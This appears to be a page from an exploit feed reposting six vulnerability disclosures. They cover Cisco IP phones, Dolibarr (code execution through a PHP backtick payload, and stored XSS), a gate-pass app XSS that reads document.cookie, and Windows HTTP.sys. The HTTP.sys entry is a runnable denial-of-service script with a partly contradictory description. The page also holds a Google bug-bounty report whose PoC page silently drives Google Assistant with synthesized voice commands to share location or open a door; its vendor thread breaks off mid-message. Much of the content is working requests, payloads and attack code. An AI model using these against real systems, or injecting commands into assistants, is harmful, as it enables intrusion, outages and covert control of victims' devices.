Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220113-0 > ======================================================================= title: Cleartext Storage of Phone Password product: Cisco IP Phone Series 78x1, 88x5, 88x1, 7832, 8832, 8821 and 3905 vulnerable version: Firmware <14.1.1, Firmware <11.0(6)SR2 (device model 8821), Firmware <9.4(1)SR5 (device model 3905) fixed version: Firmware 14.1.1, 11.0(6)SR2, 9.4(1)SR5 CVE number: CVE-2022-20660 impact: Medium homepage: https://www.cisco.com found: 2021-04-15 by: Gerhard Hechenberger (Office Vienna) Steffen Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The Cisco® IP Phone 7800 Series is a cost-effective, high-fidelity voice communications portfolio designed to improve your organization’s people-centric communications, while reducing your operating costs. It combines an attractive new ergonomic design with “always-on” reliability and secure encrypted communications. The Cisco® IP Phone 7800 Series delivers advanced IP Telephony features and crystal clear wideband audio performance to deliver an easy-to-use, full-featured voice communications experience on Cisco on-premises and hosted infrastructure platforms and third party hosted call control." Source: https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7800-series/data-sheet-c78-729488.html Business recommendation: ------------------------ SEC Consult recommends to update the devices to the newest firmware listed below, where, according to the vendor, the documented issue is fixed. We want to thank Cisco for the very professional response and great coordination. Vulnerability overview/description: ----------------------------------- 1) Cleartext Storage of Phone Password The phone is storing the "phone password", which is needed to access its administrative settings, in cleartext (in multiple locations) in the flash memory. Because the password is not hashed using a suitable cryptographic hash function and the storage is unencrypted, a physical attacker can easily recover the password and reuse it on other phones, if they are not configured to use unique administrative passwords. Proof of concept: ----------------- 1) Cleartext Storage of Phone Password Steps to take: - Configure a phone password via the TFTP XML provisioning feature. - Desoldering the memory and reading its content. - Analyzing the memory content. As example, the Linux command 'strings' can be used below to show the identified password in cleartext in the dumped data. ---------------------------------------- $ strings nand.dump | grep phonePassword phonePassword>sectest</,x phonePassword>sectest</,x phonePassword>sectest</,x phonePassword>sectest</,x ---------------------------------------- Vulnerable / tested versions: ----------------------------- The following firmware/device has been tested: * Cisco IP Phone 7821: Firmware version 12.8.1-0001-455 The vendor confirmed that the following devices are affected: * Cisco IP Phone 78x1 all releases before firmware version 14.1.1 * Cisco IP Phone 88x5 all releases before firmware version 14.1.1 * Cisco IP Phone 88x1 all releases before firmware version 14.1.1 * Cisco IP Phone 7832 all releases before firmware version 14.1.1 * Cisco IP Phone 8832 all releases before firmware version 14.1.1 * Cisco IP Phone 8821 all releases before firmware version 11.0(6)SR2 * Cisco IP Phone 3905 all releases before firmware version 9.4(1)SR5 Vendor contact timeline: ------------------------ 2021-05-19: Contacting vendor through psirt@cisco.com. Set preliminary release date to 2021-08-07. Received PSIRT case number from Cisco employee. 2021-05-20: Cisco states that the finding has been shared with the development team and is currently being analyzed. 2021-06-30: Cisco confirms affected phone models and communicates expected dates for fixed firmware releases. 2021-07-07: New estimated release date was set to 2022-01-31. 2021-12-27: Cisco informs about the fix and the publishing date 2022-01-12 for their advisory 2022-01-13: Coordinated release of the security advisory. Solution: --------- Update the firmware of the affected devices to the latest available version. See the vendor's security advisory for further information: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-info-disc-fRdJfOxA Workaround: ----------- For immediate mitigation, ensure that phones are configured to use unique administrative passwords. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Gerhard Hechenberger, Steffen Robertz / @2022 </code></pre>

<pre><code># Trovent Security Advisory 2106-01 # ##################################### Authenticated remote code execution in Dolibarr ERP & CRM ######################################################### Overview ######## Advisory ID: TRSA-2106-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2106-01 Affected product: Dolibarr ERP & CRM Tested versions: Dolibarr 13.0.2 Vendor: Dolibarr foundation, https://www.dolibarr.org Credits: Trovent Security GmbH, Nick Decker Detailed description #################### During our security research Trovent Security discovered that the Dolibarr application on default settings allows remote code execution in the website builder module. When trying to use statements like "exec()", "system()" or "shell_exec()" the application blocks them correctly. But we were able to execute code using "``" (backticks) which is the same as "shell_exec()" or "echo fread(popen('/bin/ls /', 'r'), 4096);". Severity: Critical CVSS Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) CWE ID: CWE-94 CVE ID: CVE-2021-33816 Proof of concept ################ This is the HTTP request that creates a website with the malicious code: REQUEST: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /website/index.php HTTP/1.1 Host: 10.11.9.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------243035796342141148842632336365 Content-Length: 937 Origin: http://10.11.9.80 Connection: close Referer: http://10.11.9.80/website/index.php Cookie: DOLSESSID_736206a821984837877b8a6a901910d2=v459clrdeu91pfc20se8s0rg4d; DOLUSERCOOKIE_boxfilter_task=all-securitytest-for-dolibarr Upgrade-Insecure-Requests: 1 - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="token" f8c257168a5ae06fd1aee2ba4c45ebf9 - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="backtopage" - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="action" updatesource - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="website" test - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="pageid" 1 - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="update" Save - -----------------------------243035796342141148842632336365 Content-Disposition: form-data; name="PAGE_CONTENT" <?php echo `uname -a`; ?> - -----------------------------243035796342141148842632336365-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CODE: The website now displays the output of the command: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [...] <div id="websitecontentundertopmenu" class="websitecontentundertopmenu boostrap-iso">  <style scoped=""> /* Include website CSS file */ /* CSS content (all pages) */ body.bodywebsite { margin: 0; font-family: 'Open Sans', sans-serif; } .bodywebsite h1 { margin-top: 0; margin-bottom: 0; padding: 10px;}/* Include style from the HTML header of page */ </style> <div id="divbodywebsite" class="bodywebsite bodywebpage-tsets"> Linux ec9465c86e5e 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux </div></div> [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### We recommend to disable the 'websites' module in Dolibarr until a fixed version is deployed. Fixed in Dolibarr version 14.0.0, verified by Trovent. History ####### 2021-06-01: Vulnerability found 2021-06-02: CVE ID requested 2021-06-03: CVE ID received 2021-06-09: Vendor contacted 2021-06-10: Vendor reported the vulnerability as fixed 2021-11-08: Add information about fixed version 2021-11-10: Advisory published </code></pre>

<pre><code>#!/usr/bin/python # Author @nu11secur1ty # CVE-2022-21907 from colorama import init, Fore, Back, Style init(convert=True) import requests import time print(Fore.RED +"Please input your host...\n") print(Style.RESET_ALL) print(Fore.YELLOW) host = input() print(Style.RESET_ALL) print(Fore.BLUE +"Sending an especially malicious crafted packet, please wait...") print(Style.RESET_ALL) time.sleep(17) print(Fore.GREEN) # The PoC :) poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\ BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ ****************************stupiD, *, ,',}) # Not necessary :) print(poc,"\n") print(Style.RESET_ALL) ---- Original Advisory ---- ## Title: HTTP.sys buffer overflow denial of service ## Author: nu11secur1ty ## Date: 01.12.2022 ## Vendor: https://docs.microsoft.com/ ## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0 ## CVE-2022-21907 ## Description: NOTE: After a couple of hours of tests and experiments, there have been no vulnerabilities when we decides to install the IIS packages on these Windows platforms, it's ok, and everything is patched! Windows Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service and restart the system. The attacker can be sending a maliciously crafted package to the headers of the HTTP server of the system and this will be critical for this system! Not correctly sanitizing! Status: CRITICAL ## Simple test connection before debugging ```cmd curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css">  </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> ``` ## 302 ```cmd curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css">  </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> ``` ## 404 ```cmd curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css">  </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> ``` ## Bugcheck: ```cmd 1: kd> kp Child-SP RetAddr Call Site ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69 ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0 ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323 ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63 ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5 ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51 ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218 ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7 ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112 ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55 ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28 1: kd> !analyze ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* KERNEL_SECURITY_CHECK_FAILURE (139) A kernel component has corrupted a critical data structure. The corruption could potentially allow a malicious user to gain control of this machine. Arguments: Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove). Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck Arg4: 0000000000000000, Reserved Debugging Details: ------------------ *** WARNING: Unable to verify timestamp for win32k.sys BUGCHECK_CODE: 139 BUGCHECK_P1: 3 BUGCHECK_P2: ffffa10287993480 BUGCHECK_P3: ffffa102879933d8 BUGCHECK_P4: 0 PROCESS_NAME: System ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63 MODULE_NAME: HTTP IMAGE_NAME: HTTP.sys FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd} Followup: MachineOwner --------- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907) ## Proof and Exploit: [href](https://streamable.com/fbojva) </code></pre>

<pre><code># Trovent Security Advisory 2105-02 # ##################################### Stored cross-site scripting in Dolibarr ERP & CRM ################################################# Overview ######## Advisory ID: TRSA-2105-02 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2105-02 Affected product: Dolibarr ERP & CRM Tested versions: Dolibarr 13.0.2 Vendor: Dolibarr foundation, https://www.dolibarr.org Credits: Trovent Security GmbH, Nick Decker Detailed description #################### Trovent Security GmbH discovered that the Dolibarr application does not escape "greater than" and "smaller than" characters if they are reflected in one of the small pop-up windows with details of the object. This allows an attacker to add certain custom HTML tags and attributes. In our PoC we used a "body" tag in conjunction with an "onpointermove" attribute to achieve constant execution of the inserted JavaScript code. Severity: Critical CVSS Score: 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) CWE ID: CWE-79 CVE ID: CVE-2021-33618 Proof of concept ################ This is the HTTP request to change the group name: REQUEST: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /user/group/card.php HTTP/1.1 Host: 10.11.9.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836 Content-Length: 950 Origin: http://10.11.9.80 Connection: close Referer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6 Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaq Upgrade-Insecure-Requests: 1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="token" 6585d0838337cafddc3387fcccbe9d91 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="action" update - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="backtopage" /user/group/card.php?id=1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="id" 1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="nom" Trovent<<body onpointermove=alert(1) <>test - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="note" - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="save" Save - -----------------------------329097076628264922392755475836-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CODE: The HTML code of the site then includes the attribute in its body tag: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <body id="mainbody" class="sidebar-collapse" <="" onpointermove="alert(1)" style="margin-bottom: 26px;">  <div class="side-nav-vert"><div id="id-top"><div id="tmenu_tooltip" class="tmenu"> [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### To mitigate this vulnerability, we recommend to always escape the user input regardless of where it is reflected. Additionally we recommend to blacklist all HTML tags and attributes. Fixed in Dolibarr version 14.0.0, verified by Trovent. History ####### 2021-05-25: Vulnerability found 2021-05-28: CVE ID requested & received 2021-05-31: Vendor contacted 2021-06-02: Vendor reported the vulnerability as fixed 2021-11-08: Add information about fixed version 2021-11-10: Advisory published </code></pre>

<pre><code># Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) # Date: 10.11.2021 # Exploit Author: İlhami Selamet # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code # Version: v1.0 # Tested on: Kali Linux + XAMPP v8.0.12 Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department Step 1 - Click on the 'Create New' button for adding a new department. Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script> Step 3 - Save the department. The stored XSS triggers for all users that navigate to the 'Department List' page. PoC POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 Content-Length: 555 Origin: http://localhost Connection: close Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="id" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="name" <script>alert(document.cookie);</script> -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="description" desc -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="status" 1 -----------------------------407760789114464123714007564888-- </code></pre>

<pre><code>#0011 Vendor: Google Status: fixed Reported: Nov 25, 2019 Disclosed: Oct 10, 2021 (685 days) Auth Bypass in Google Assistant Summary: Webpage can execute Google Assistant commands without any permissions Steps to reproduce: Generate the TTS audio files using the Google Cloud TTS API, using the text commands in the JavaScript comments Make sure the device is not muted, or have headphones connected Open the POC HTML on an Android device with Google Assistant Click one of the POC attacks See the Google Assistant commands execute automatically, without any permissions This attack works by first triggering Google Assistant using a deeplink (acquired from the mobile “google.com” page, where there is a button to trigger the Assistant) and after a bit of delay, playing TTS generated commands as plain audio. This attack can be exploited the same way (or sending a “VOICE_COMMAND” intent) by Android applications (without any permissions required), actually that was my first idea, but I figured that the impact is way higher if a victim only has to visit a webpage to get the same results. One weird thing I noticed while testing using the Chrome browser on Android, is that an audio file is played differently depending on the length. This forced me to split the attacking commands into different audio files (for example the “share location” and the phone number are different commands), since when I tried to play the longer audio file, Chrome interpreted it as a “media”, and displayed the media control notification as well. And triggering Assistant while a longer audio “media” was playing, caused Assistant to pause the audio. When using shorter audio files, the media control notification did not appear, and Assistant didn’t pause the media, allowing it to execute the malicious commands. I used the Cloud Text-to-Speech API to generate the audio files. I used language_code=’en-US’ and name=”en-US-Wavenet-A” to generate the audio files. All of the text input used to generate the audio files can be found in the JavaScript comments. I attached 2 POC videos to make it easier to see the attack running: Single command POC Video: https://youtu.be/T3CgECvV-qM Multiple command / Confirmation POC Video: [redacted] — POC HTML — <html> <body> <h1> <a onclick="share()" href="googleapp://deeplink/?data=CkwBDb3mGzBFAiEAic8-0un3nRrMa_hkMUV9fj_zD09xhu9D6xTXEsFSRPICIEJlWlJRSqv3afrbX9J8BZa_h3sAfF8NSDFAlLSj10MUEjkKAggAEgIIbxoQEg4IBBIK6oqo9AQECAFAACIdChtodHRwOi8vYXNzaXN0YW50Lmdvb2dsZS5jb20"> share location</a> </h1> <h1> <a onclick="opendoor()" href="googleapp://deeplink/?data=CkwBDb3mGzBFAiEAic8-0un3nRrMa_hkMUV9fj_zD09xhu9D6xTXEsFSRPICIEJlWlJRSqv3afrbX9J8BZa_h3sAfF8NSDFAlLSj10MUEjkKAggAEgIIbxoQEg4IBBIK6oqo9AQECAFAACIdChtodHRwOi8vYXNzaXN0YW50Lmdvb2dsZS5jb20">open front door</a> </h1> <script> // language_code='en-US' // name="en-US-Wavenet-A" function share() { setTimeout(function() { var audio = new Audio('share1.mp3'); // "share my location with" audio.play(); setTimeout(function() { var audio = new Audio('share2.mp3'); // "[redacted]" [PHONE NUMBER TO SEND SMS TO] audio.play(); setTimeout(function() { var audio = new Audio('confirm.mp3'); // "send it" audio.play(); }, 12000); }, 6000); }, 500); } function opendoor() { setTimeout(function() { var audio = new Audio('open.mp3'); // "open the front door" audio.play(); }, 500); } </script> </body> </html> — END POC HTML — Attack scenario: This attack allows an attacker to execute malicious commands in Google Assistant, on behalf of the victim, just by making the victim visit a webpage. The Assistant has access to extremely sensitive information, and may be able to control the victim’s Google Account, Smart Home, and other IOT appliances. An attacker should never be able to execute commands in Google Assistant, without having sufficient permissions. Limitation of this attack: The phone must not be muted or have headphones connected, since Google Assistant wouldn’t hear the malicious audio The malicious commands could be heard by the user, since they are playing out loud The attack will fail if the user closes the Assistant mid-attack Why I checked “Is this vulnerability public or known to third parties?”: I found out about this issue (only the idea of playing the commands as audio, using the phone) by browsing forums where people were talking about finding ways to execute Assistant commands to automate their different workflows. This method was posted publicly as an “Automate” (Android automating app) “flow” to execute an Assistant command. Their motivations wasn’t malicious, but I realized that this method could be abused by an attacker, and made it into a POC. Therefore, I mark this vulnerability as public, since anyone can find this information and use it for malicious purposes. Comments: Vendor - 2019-11-25 10:17 ** NOTE: This e-mail has been generated automatically. ** Thanks for your report. This email confirms we’ve received your message. We’ll investigate and get back to you once we’ve got an update. In the meantime, you might want to take a look at the list of frequently asked questions about Google VRP at https://sites.google.com/site/bughunteruniversity/behind-the-scenes/faq. If you are reporting a security vulnerability and wish to appear in Google Security Hall of Fame, please create a profile at https://bughunter.withgoogle.com/new_profile. You appear automatically in our Honorable Mentions if we decide to file a security vulnerability based on your report, and you will also show up in our Hall of Fame if we issue a reward. Note that if you did not report a vulnerability, or a technical security problem in one of our products, we won’t be able to act on your report. This channel is not the right one if you wish to resolve a problem with your account, report non-security bugs, or suggest a new feature in our product. Cheers, Google Security Bot Follow us on Twitter! https://twitter.com/googlevrp Me - 2019-11-25 10:26 One possible fix for this could be to disable any playing audio on the device when the Assistant is listening for commands. Vendor - 2019-11-25 13:29 ** NOTE: This e-mail has been generated automatically. ** Hey, Just letting you know that your report was triaged and we’re currently looking into it. You should receive a response in a couple of days, but it might take up to a week if we’re particularly busy. In the meantime, you might want to take a look at the list of frequently asked questions about Google VRP at https://sites.google.com/site/bughunteruniversity/behind-the-scenes/faq. Thanks, Google Security Bot Me - 2019-11-26 16:52 One more thing to add is that if a Android application is using the same method to issue malicious Assistant commands, it could bypass one or more of the above mentioned limitations that a website is unable to: The muted phone, by playing the audio as an alarm so it plays even when the phone is set to silent The need for not having any headphones plugged in / connected, by playing the audio as an alarm, because in my limited research that seems to play on both the headphones and on the speaker, or by routing the audio using the setSpeakerphoneOn(true) method. These should not require any/dangerous permissions. Thanks, David Vendor - 2019-12-02 16:28 Hi, Nice catch! I’ve filed a bug based on your report. All you need to do now is wait. If you don’t hear back from us in 2-3 weeks or have additional information about the vulnerability, let us know! Regards, Google Trust and Safety Me - 2019-12-18 00:20 ** NOTE: This is an automatically generated email ** Hello, Thank you for reporting this bug. As part of Google’s Vulnerability Reward Program, the panel has decided to issue a reward of $500.00. Important: if you aren’t registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to do it again - sit back and relax, and we will process the payment soon. If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from. Regards, Google Security Bot If you’d like your name added to our Hall of Fame: https://bughunter.withgoogle.com/ Just create a profile here: https://bughunter.withgoogle.com/new_profile In addition, we encourage you to signup for our Vulnerability Research Grants program, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found. To read more about the program visit: https://www.google.com/about/appsecurity/research-grants/ – How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH). Vendor - 2020-01-07 16:41 Hey David, We were reviewing past VRP reports for our end of the year review and it came to our attention that your report was not correctly assessed, when it was previously reviewed in our reward panel. I have sent your report back for a second review and you should be receiving an updated reward decision next week. Regards, [redacted], Google Trust & Safety Vendor - 2020-01-17 00:20 ** NOTE: This is an automatically generated email ** Hello, Thank you for reporting this bug. As part of Google’s Vulnerability Reward Program, the panel has decided to issue a reward of $4500.00. Important: if you aren’t registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to do it again - sit back and relax, and we will process the payment soon. If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from. Regards, Google Security Bot If you’d like your name added to our Hall of Fame: https://bughunter.withgoogle.com/ Just create a profile here: https://bughunter.withgoogle.com/new_profile In addition, we encourage you to signup for our Vulnerability Research Grants program, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found. To read more about the program visit: https://www.google.com/about/appsecurity/research-grants/ – How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH). Me - 2020-04-19 20:40 Hi! I have plans around potentially disclosing this issue in a talk at a security conference in October 2020. I am writing this to ask about the status of this issue and to request permission to disclose this issue when it will become fully fixed. Would the disclosure time of October 2020 be possible? Thank you, David Vendor - 2020-04-30 16:07 Hi David, Disclosure around October 2020 should be fine. Best of luck with preparing with your talk and if you would like us to review any of your presentation for feedback, please let us know! Regards, [redacted], Google Trust & Safety Vendor - 2020-12-11 11:09 Hi David, Per our email discussion, sending you a note just as an FYI: We classified this report as an abuse risk. Best of luck in your future research, [redacted] Me - 2021-02-25 09:04 Hi, Can I ask what the fix was here? My POC broke, looks like that link which triggered Assistant is now disabled. But, I can still play malicious audio to Assistant, if it was triggered manually. Is only the “programatic triggering” that was removed? If so, if I find any other way to auto-trigger Assistant, is that considered a new bug? Thank you, David Me - 2021-03-03 10:17 Hi David, I’m not sure if I fully understand your question - so please let me know if I missed anything. In your initial report, you were able to execute Google Assistant commands automatically, without any user permissions. The root cause that led to this particular issue has been fixed now. Of course, if you are able to identify a different way to auto-trigger Assistant we would be really curious to hear about. Let me know if you have any other questions! Best, [redacted] Vendor - 2021-04-28 10:42 The status of this report is being changed so that our automation will notify you when the underlying bug is fixed. There isn’t any action needed on your part here, just a book-keeping change. Apologies for the extra noise/email. Me - 2021-03-14 18:25 Hi, Good news (for me, at least), the deeplink is back! It looks to have some extra protection, and sometimes it’s glitching all over the place, but I was able to bypass it if the user has some music playing: https://youtu.be/phIgnbaGDHo Thank you, David Me - 2021-03-14 18:35 Some extra info, if teams would be confused about the origin of this deeplink: This link is used on google.com, when visited with an (android?) User Agent. \ When the bug got fixed initially, this button also became unusable (but it was still there), but few days ago I pressed it, and it was working again, hence I tried the POC. And now it works again, with the same exact deeplink the original POC had in 2019. I attached a picture of what it looks like. Vendor - 2021-03-18 13:17 Hi David, 